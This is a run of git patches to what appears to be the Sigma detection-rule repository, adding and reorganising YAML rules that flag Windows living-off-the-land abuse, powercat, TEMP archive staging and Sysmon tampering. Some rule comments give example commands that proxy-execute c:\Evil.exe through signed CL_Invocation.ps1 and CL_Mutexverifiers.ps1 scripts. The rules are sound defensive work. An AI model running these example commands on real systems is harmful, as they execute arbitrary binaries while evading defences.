count(ScriptBlockText) by Computer > 2 + # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 + # PS > runAfterCancelProcess c:\Evil.exe +falsepositives: + - Unknown +level: high From 57bfdc7a028eb7b6dd2a762dfd053ebddb31f8bf Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:19:23 +0200 Subject: [PATCH 0764/1367] fix: more upper case chars --- .../win_cl_invocation_lolscript.yml | 26 +++++++++++++++++++ .../win_cl_mutexverifiers_lolscript.yml | 26 +++++++++++++++++++ 2 files changed, 52 insertions(+) create mode 100644 rules/windows/process_creation/win_cl_invocation_lolscript.yml create mode 100644 rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml diff --git a/rules/windows/process_creation/win_cl_invocation_lolscript.yml b/rules/windows/process_creation/win_cl_invocation_lolscript.yml new file mode 100644 index 00000000..04a8b5dd --- /dev/null +++ b/rules/windows/process_creation/win_cl_invocation_lolscript.yml @@ -0,0 +1,26 @@ +title: Execution via CL_Invocation.ps1 +id: a0459f02-ac51-4c09-b511-b8c9203fc429 +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml + - https://twitter.com/bohops/status/948061991012327424 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'CL_Invocation.ps1' + - 'SyncInvoke' + # Example Commandline: "powershell Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1; SyncInvoke c:\Evil.exe" + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml b/rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml new file mode 100644 index 00000000..4fd2f44c --- /dev/null +++ b/rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml @@ -0,0 +1,26 @@ +title: Execution via CL_Mutexverifiers.ps1 +id: 99465c8f-f102-4157-b11c-b0cddd53b79a +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml + - https://twitter.com/pabraeken/status/995111125447577600 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'CL_Mutexverifiers.ps1' + - 'runAfterCancelProcess' + # Example Commandline: "powershell Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1; runAfterCancelProcess c:\Evil.exe" + condition: selection +falsepositives: + - Unknown +level: high From 8b4fce3473e761633e737b9d18c6f04ba1338ac1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:21:44 +0200 Subject: [PATCH 0765/1367] removed unneeded upper ticks --- rules/windows/powershell/powershell_cl_Invocation_lolscript.yml | 2 +- .../powershell/powershell_cl_Mutexverifiers_lolscript.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml b/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml index 3976c19f..054cd341 100644 --- a/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml +++ b/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml index a9e742a2..3430cdd7 100644 --- a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml +++ b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 From a8d8d878a04c8b1a7f77dcc88609b81485b73c8a Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:27:11 +0200 Subject: [PATCH 0766/1367] remove uppercase files --- .../powershell_cl_Invocation_lolscript.yml | 27 ----------------- .../powershell_cl_Invocation_lolscript_v2.yml | 29 ------------------- ...powershell_cl_Mutexverifiers_lolscript.yml | 27 ----------------- ...ershell_cl_Mutexverifiers_lolscript_v2.yml | 29 ------------------- 4 files changed, 112 deletions(-) delete mode 100644 rules/windows/powershell/powershell_cl_Invocation_lolscript.yml delete mode 100644 rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml delete mode 100644 rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml delete mode 100644 rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml diff --git a/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml b/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml deleted file mode 100644 index 054cd341..00000000 --- a/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml +++ /dev/null @@ -1,27 +0,0 @@ -title: Execution via CL_Invocation.ps1 -id: 4cd29327-685a-460e-9dac-c3ab96e549dc -description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml - - https://twitter.com/bohops/status/948061991012327424 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: Script block logging must be enabled -detection: - selection: - EventID: 4104 - ScriptBlockText|contains|all: - - 'CL_Invocation.ps1' - - 'SyncInvoke' - condition: selection -falsepositives: - - Unknown -level: high diff --git a/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml deleted file mode 100644 index 5cd1d3ad..00000000 --- a/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml +++ /dev/null @@ -1,29 +0,0 @@ -title: Execution via CL_Invocation.ps1 (2 Lines) -id: f588e69b-0750-46bb-8f87-0e9320d57536 -description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml - - https://twitter.com/bohops/status/948061991012327424 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: 'Script block logging must be enabled' -detection: - selection2: - EventID: 4104 - ScriptBlockText|contains: - - 'CL_Invocation.ps1' - - 'SyncInvoke' - condition: selection2 | count(ScriptBlockText) by Computer > 2 - # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - # PS > SyncInvoke c:\Evil.exe -falsepositives: - - Unknown -level: high diff --git a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml deleted file mode 100644 index 3430cdd7..00000000 --- a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml +++ /dev/null @@ -1,27 +0,0 @@ -title: Execution via CL_Mutexverifiers.ps1 -id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 -description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml - - https://twitter.com/pabraeken/status/995111125447577600 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: Script block logging must be enabled -detection: - selection: - EventID: 4104 - ScriptBlockText|contains|all: - - 'CL_Mutexverifiers.ps1' - - 'runAfterCancelProcess' - condition: selection -falsepositives: - - Unknown -level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml deleted file mode 100644 index 8a0fa3a3..00000000 --- a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml +++ /dev/null @@ -1,29 +0,0 @@ -title: Execution via CL_Mutexverifiers.ps1 (2 Lines) -id: 6609c444-9670-4eab-9636-fe4755a851ce -description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml - - https://twitter.com/pabraeken/status/995111125447577600 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: 'Script block logging must be enabled' -detection: - selection2: - EventID: 4104 - ScriptBlockText|contains: - - 'CL_Mutexverifiers.ps1' - - 'runAfterCancelProcess' - condition: selection2 | count(ScriptBlockText) by Computer > 2 - # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - # PS > runAfterCancelProcess c:\Evil.exe -falsepositives: - - Unknown -level: high From 3a305e82b9b2e38c088bc018a48d8cb593c6a956 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:28:20 +0200 Subject: [PATCH 0767/1367] fix: remove renamed files --- .../powershell_cl_invocation_lolscript_v2.yml | 29 ------------------- ...ershell_cl_mutexverifiers_lolscript_v2.yml | 29 ------------------- 2 files changed, 58 deletions(-) delete mode 100644 rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml delete mode 100644 rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml diff --git a/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml deleted file mode 100644 index 5cd1d3ad..00000000 --- a/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml +++ /dev/null @@ -1,29 +0,0 @@ -title: Execution via CL_Invocation.ps1 (2 Lines) -id: f588e69b-0750-46bb-8f87-0e9320d57536 -description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml - - https://twitter.com/bohops/status/948061991012327424 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: 'Script block logging must be enabled' -detection: - selection2: - EventID: 4104 - ScriptBlockText|contains: - - 'CL_Invocation.ps1' - - 'SyncInvoke' - condition: selection2 | count(ScriptBlockText) by Computer > 2 - # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - # PS > SyncInvoke c:\Evil.exe -falsepositives: - - Unknown -level: high diff --git a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml deleted file mode 100644 index 8a0fa3a3..00000000 --- a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml +++ /dev/null @@ -1,29 +0,0 @@ -title: Execution via CL_Mutexverifiers.ps1 (2 Lines) -id: 6609c444-9670-4eab-9636-fe4755a851ce -description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml - - https://twitter.com/pabraeken/status/995111125447577600 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: 'Script block logging must be enabled' -detection: - selection2: - EventID: 4104 - ScriptBlockText|contains: - - 'CL_Mutexverifiers.ps1' - - 'runAfterCancelProcess' - condition: selection2 | count(ScriptBlockText) by Computer > 2 - # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - # PS > runAfterCancelProcess c:\Evil.exe -falsepositives: - - Unknown -level: high From cfbde22d2d1a6f082f7c866ac97ad1d8bdef3184 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 10:10:14 +0200 Subject: [PATCH 0768/1367] rule: PRIVATELOG image load --- .../image_load/win_susp_svchost_clfsw32.yml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 rules/windows/image_load/win_susp_svchost_clfsw32.yml diff --git a/rules/windows/image_load/win_susp_svchost_clfsw32.yml b/rules/windows/image_load/win_susp_svchost_clfsw32.yml new file mode 100644 index 00000000..2a58dabc --- /dev/null +++ b/rules/windows/image_load/win_susp_svchost_clfsw32.yml @@ -0,0 +1,19 @@ +title: APT PRIVATELOG Image Load Pattern +id: 33a2d1dd-f3b0-40bd-8baf-7974468927cc +status: experimental +description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances +references: + - https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html +author: Florian Roth +date: 2021/09/07 +logsource: + category: image_load + product: windows +detection: + selection: + Image|endswith: '\svchost.exe' + ImageLoaded|endswith: '\clfsw32.dll' + condition: selection +falsepositives: + - Rarely observed +level: high From 0e5e4fa19d9f797d0cb6f6a55e429df1e209dedf Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 7 Sep 2021 13:30:32 +0200 Subject: [PATCH 0769/1367] Split global rules --- .../powershell_classic_powercat.yml | 31 +++++++++++ ...usp_athremotefxvgpudisablementcommand.yml} | 54 +++++-------------- .../powershell_classic_susp_zip_compress.yml} | 40 +++----------- .../powershell/powershell_powercat.yml | 24 ++------- ...susp_athremotefxvgpudisablementcommand.yml | 37 +++++++++++++ .../powershell_susp_zip_compress.yml | 28 ++++++++++ ...susp_athremotefxvgpudisablementcommand.yml | 37 +++++++++++++ .../process_creation_susp_zip_compress.yml | 29 ++++++++++ ...l => sysmon_config_modification_error.yml} | 25 +++------ .../sysmon_config_modification_status.yml | 25 +++++++++ 10 files changed, 219 insertions(+), 111 deletions(-) create mode 100644 rules/windows/powershell/powershell_classic_powercat.yml rename rules/windows/{builtin/win_susp_athremotefxvgpudisablementcommand.yml => powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml} (56%) rename rules/windows/{builtin/win_susp_zip_compress.yml => powershell/powershell_classic_susp_zip_compress.yml} (54%) create mode 100644 rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml create mode 100644 rules/windows/powershell/powershell_susp_zip_compress.yml create mode 100644 rules/windows/process_creation/process_creation_susp_athremotefxvgpudisablementcommand.yml create mode 100644 rules/windows/process_creation/process_creation_susp_zip_compress.yml rename rules/windows/sysmon/{sysmon_config_modification.yml => sysmon_config_modification_error.yml} (66%) create mode 100644 rules/windows/sysmon/sysmon_config_modification_status.yml diff --git a/rules/windows/powershell/powershell_classic_powercat.yml b/rules/windows/powershell/powershell_classic_powercat.yml new file mode 100644 index 00000000..3ef28100 --- /dev/null +++ b/rules/windows/powershell/powershell_classic_powercat.yml @@ -0,0 +1,31 @@ +title: Netcat The Powershell Version +id: c5b20776-639a-49bf-94c7-84f912b91c15 +related: + - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 + type: derived +status: experimental +author: frack113 +date: 2021/07/21 +modified: 2021/09/07 +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network +references: + - https://nmap.org/ncat/ + - https://github.com/besimorhino/powercat + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md +tags: + - attack.command_and_control + - attack.t1095 +logsource: + product: windows + service: powershell-classic + definition: fields have to be extract from event +detection: + selection: + EventID: 400 + HostApplication|contains: + - 'powercat ' + - 'powercat.ps1' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml similarity index 56% rename from rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml rename to rules/windows/powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml index 6fdd897e..21bd9de4 100644 --- a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml @@ -1,8 +1,12 @@ -action: global title: Abusable Invoke-ATHRemoteFXvGPUDisablementCommand +id: f65e22f9-819e-4f96-9c7b-498364ae7a25 +related: + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 + type: derived status: experimental author: frack113 date: 2021/07/13 +modified: 2021/09/07 description: RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md @@ -10,31 +14,6 @@ references: tags: - attack.defense_evasion - attack.t1218 -fields: - - ComputerName - - User - - CommandLine - - ParentCommandLine -falsepositives: - - Unknown -level: medium ---- -id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 -logsource: - product: windows - category: process_creation -detection: - selection_cmd: - CommandLine|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' - selection_opt: - CommandLine|contains: - - '-ModuleName ' - - '-ModulePath ' - - '-ScriptBlock ' - - '-RemoteFXvGPUDisablementFilePath' - condition: selection_cmd and selection_opt ---- -id: f65e22f9-819e-4f96-9c7b-498364ae7a25 logsource: product: windows service: powershell-classic @@ -49,18 +28,11 @@ detection: - '-ScriptBlock ' - '-RemoteFXvGPUDisablementFilePath' condition: selection_cmd and selection_opt ---- -id: 38a7625e-b2cb-485d-b83d-aff137d859f4 -logsource: - product: windows - service: powershell -detection: - selection_cmd: - ContextInfo|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' - selection_opt: - ContextInfo|contains: - - '-ModuleName ' - - '-ModulePath ' - - '-ScriptBlock ' - - '-RemoteFXvGPUDisablementFilePath' - condition: selection_cmd and selection_opt \ No newline at end of file +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/builtin/win_susp_zip_compress.yml b/rules/windows/powershell/powershell_classic_susp_zip_compress.yml similarity index 54% rename from rules/windows/builtin/win_susp_zip_compress.yml rename to rules/windows/powershell/powershell_classic_susp_zip_compress.yml index 4f0ab147..70fa976b 100644 --- a/rules/windows/builtin/win_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_classic_susp_zip_compress.yml @@ -1,32 +1,18 @@ -action: global title: Zip A Folder With PowerShell For Staging In Temp +id: 71ff406e-b633-4989-96ec-bc49d825a412 +related: + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 + type: derived status: experimental author: frack113 date: 2021/07/20 +modified: 2021/09/07 description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md tags: - attack.collection - attack.t1074.001 -falsepositives: - - Unknown -level: medium ---- -id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 -logsource: - product: windows - category: process_creation -detection: - selection: - CommandLine|contains|all: - - 'Compress-Archive ' - - ' -Path ' - - ' -DestinationPath ' - - '$env:TEMP\' - condition: selection ---- -id: 71ff406e-b633-4989-96ec-bc49d825a412 logsource: product: windows service: powershell-classic @@ -39,16 +25,6 @@ detection: - ' -DestinationPath ' - '$env:TEMP\' condition: selection ---- -id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 -logsource: - product: windows - service: powershell -detection: - selection: - ContextInfo|contains|all: - - 'Compress-Archive ' - - ' -Path ' - - ' -DestinationPath ' - - '$env:TEMP\' - condition: selection \ No newline at end of file +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml index bf10582d..f024c450 100644 --- a/rules/windows/powershell/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_powercat.yml @@ -1,8 +1,9 @@ -action: global title: Netcat The Powershell Version +id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 status: experimental author: frack113 date: 2021/07/21 +modified: 2021/09/07 description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ @@ -11,24 +12,6 @@ references: tags: - attack.command_and_control - attack.t1095 -falsepositives: - - Unknown -level: medium ---- -id: c5b20776-639a-49bf-94c7-84f912b91c15 -logsource: - product: windows - service: powershell-classic - definition: fields have to be extract from event -detection: - selection: - EventID: 400 - HostApplication|contains: - - 'powercat ' - - 'powercat.ps1' - condition: selection ---- -id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 logsource: product: windows service: powershell @@ -40,3 +23,6 @@ detection: - 'powercat ' - 'powercat.ps1' condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml new file mode 100644 index 00000000..214610d7 --- /dev/null +++ b/rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml @@ -0,0 +1,37 @@ +title: Abusable Invoke-ATHRemoteFXvGPUDisablementCommand +id: 38a7625e-b2cb-485d-b83d-aff137d859f4 +status: experimental +author: frack113 +date: 2021/07/13 +modified: 2021/09/07 +description: RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md + - https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + service: powershell + definition: Module Logging must be enabled +detection: + selection_id: + EventID: 4103 + selection_cmd: + ContextInfo|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' + selection_opt: + ContextInfo|contains: + - '-ModuleName ' + - '-ModulePath ' + - '-ScriptBlock ' + - '-RemoteFXvGPUDisablementFilePath' + condition: selection_id and selection_cmd and selection_opt +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_susp_zip_compress.yml new file mode 100644 index 00000000..be6c466f --- /dev/null +++ b/rules/windows/powershell/powershell_susp_zip_compress.yml @@ -0,0 +1,28 @@ +title: Zip A Folder With PowerShell For Staging In Temp +id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 +status: experimental +author: frack113 +date: 2021/07/20 +modified: 2021/09/07 +description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md +tags: + - attack.collection + - attack.t1074.001 +logsource: + product: windows + service: powershell + definition: Module Logging must be enabled +detection: + selection: + EventID: 4103 + ContextInfo|contains|all: + - 'Compress-Archive ' + - ' -Path ' + - ' -DestinationPath ' + - '$env:TEMP\' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/rules/windows/process_creation/process_creation_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/process_creation/process_creation_susp_athremotefxvgpudisablementcommand.yml new file mode 100644 index 00000000..073b04bb --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_athremotefxvgpudisablementcommand.yml @@ -0,0 +1,37 @@ +title: Abusable Invoke-ATHRemoteFXvGPUDisablementCommand +id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 +related: + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 + type: derived +status: experimental +author: frack113 +date: 2021/07/13 +modified: 2021/09/07 +description: RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md + - https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + category: process_creation +detection: + selection_cmd: + CommandLine|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' + selection_opt: + CommandLine|contains: + - '-ModuleName ' + - '-ModulePath ' + - '-ScriptBlock ' + - '-RemoteFXvGPUDisablementFilePath' + condition: selection_cmd and selection_opt +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_susp_zip_compress.yml b/rules/windows/process_creation/process_creation_susp_zip_compress.yml new file mode 100644 index 00000000..caf3e233 --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_zip_compress.yml @@ -0,0 +1,29 @@ +title: Zip A Folder With PowerShell For Staging In Temp +id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 +related: + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 + type: derived +status: experimental +author: frack113 +date: 2021/07/20 +modified: 2021/09/07 +description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md +tags: + - attack.collection + - attack.t1074.001 +logsource: + product: windows + category: process_creation +detection: + selection: + CommandLine|contains|all: + - 'Compress-Archive ' + - ' -Path ' + - ' -DestinationPath ' + - '$env:TEMP\' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification_error.yml similarity index 66% rename from rules/windows/sysmon/sysmon_config_modification.yml rename to rules/windows/sysmon/sysmon_config_modification_error.yml index 6ca045a7..c91e0d20 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification_error.yml @@ -1,32 +1,16 @@ -action: global -title: Sysmon Configuration Modification +title: Sysmon Configuration Error +id: 815cd91b-7dbc-4247-841a-d7dd1392b0a8 description: Someone try to hide from Sysmon status: experimental author: frack113 date: 2021/06/04 -modified: 2021/06/16 +modified: 2021/09/07 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html tags: - attack.defense_evasion - attack.t1564 -falsepositives: - - legitimate administrative action -level: high ---- -id: 1f2b5353-573f-4880-8e33-7d04dcf97744 -logsource: - product: windows - category: sysmon_status -detection: - selection_stop: - State: Stopped - selection_conf: - - 'Sysmon config state changed' - condition: selection_stop or selection_conf ---- -id: 815cd91b-7dbc-4247-841a-d7dd1392b0a8 logsource: product: windows category: sysmon_error @@ -36,3 +20,6 @@ detection: - 'Failed to open service configuration with error' - 'Failed to connect to the driver to update configuration' condition: selection_error +falsepositives: + - legitimate administrative action +level: high \ No newline at end of file diff --git a/rules/windows/sysmon/sysmon_config_modification_status.yml b/rules/windows/sysmon/sysmon_config_modification_status.yml new file mode 100644 index 00000000..e2330610 --- /dev/null +++ b/rules/windows/sysmon/sysmon_config_modification_status.yml @@ -0,0 +1,25 @@ +title: Sysmon Configuration Modification +id: 1f2b5353-573f-4880-8e33-7d04dcf97744 +description: Someone try to hide from Sysmon +status: experimental +author: frack113 +date: 2021/06/04 +modified: 2021/09/07 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md + - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html +tags: + - attack.defense_evasion + - attack.t1564 +logsource: + product: windows + category: sysmon_status +detection: + selection_stop: + State: Stopped + selection_conf: + - 'Sysmon config state changed' + condition: selection_stop or selection_conf +falsepositives: + - legitimate administrative action +level: high From eef6e71e2ef222bb484602368a146412d9e62a30 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Tue, 7 Sep 2021 12:39:56 +0100 Subject: [PATCH 0770/1367] Update AWS Update Login Profile Rule fields Missed updating field from `responseElements.accessKey.userName` to `requestParameters.userName` on last update. --- rules/cloud/aws/aws_update_login_profile.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/aws/aws_update_login_profile.yml b/rules/cloud/aws/aws_update_login_profile.yml index 6815fe2f..b4254d07 100644 --- a/rules/cloud/aws/aws_update_login_profile.yml +++ b/rules/cloud/aws/aws_update_login_profile.yml @@ -5,7 +5,7 @@ description: | An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. With this alert, it is used to detect anyone is changing password on behalf of other users. author: toffeebr33k -date: 2021/08/09 +date: 2021/09/07 references: - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation logsource: @@ -19,7 +19,7 @@ detection: condition: selection_source and not filter fields: - userIdentity.arn - - responseElements.accessKey.userName + - requestParameters.userName - errorCode - errorMessage falsepositives: From 1a55f4a294656b868baa10e43a5e7f95bbefed44 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 14:37:03 +0200 Subject: 